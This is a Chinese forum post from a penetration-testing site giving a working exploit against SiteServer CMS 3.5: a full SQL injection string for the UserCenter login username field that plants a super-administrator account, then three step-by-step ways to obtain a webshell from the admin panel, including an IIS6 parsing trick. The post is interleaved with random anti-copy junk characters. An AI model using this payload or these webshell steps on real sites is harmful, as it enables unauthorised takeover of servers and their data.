中国网络渗透测试联盟
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
[打印本页]
作者:
admin
时间:
2013-2-16 21:40
标题:
SiteServer CMS UserCenter/login.aspx页面用户名处sql注射
经测试秒杀最新的3.5版
; \. d, i+ `2 O; d/ _/ |' E
stieserver官网:
www.siteserver.cn
1 c& ?: E6 I! l
EXP:
y. \" `& n) e8 e/ T
直接访问UserCenter/login.aspx
6 X m2 @ V+ f7 O) b+ J- w
用户名处输入:
( k& |- y4 G$ f0 B. R: A9 u' G
$ p4 P8 E( r* O- Q3 ? Z% C
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
+ S2 ^ w h1 }0 B0 N" \$ i' z( I
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
0 m) [4 X. w8 V# E4 D
之后再访问后台SiteServer/login.aspx用插入的用户登陆
0 C: \" V% T+ E) }( J, O
后台拿webshell的三种方法:
( d* Q( o. M7 Q- s4 N4 G) ~
一、
. t) Q* ?+ ^% L9 \7 S; f6 Q& b" |3 k
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
: R$ t( G) \7 q+ _ {& t ^
二、
0 |, L" ]$ m* n9 @( I4 Z1 z) L- m; C
成员权限-》添加用户-》用户名为:1.asp
* c( }; m+ t9 G' F' L
http://127.0.0.1/usercenter/
0 P9 v& F8 l# s
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
F; b7 @0 Y9 V
(ps:后台添加用户时不会验证是否含有非法字符)
, r( G- `2 ^) I- h6 ~$ B. t0 w6 I
三、
4 [: d3 o; Y4 f H+ Q1 `$ @. W
系统工具-》实用工具-》机器参数查看
. Z- f9 u& H7 @7 e; ~9 U. _' u( c: w
可以看到数据库类型、名称,WEB路径
" m+ K* y3 l5 L1 a" _* }9 k* J+ C
系统工具-》数据库工具-》SQL语句查询
2 n1 M% _6 z7 O/ \/ n, g
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2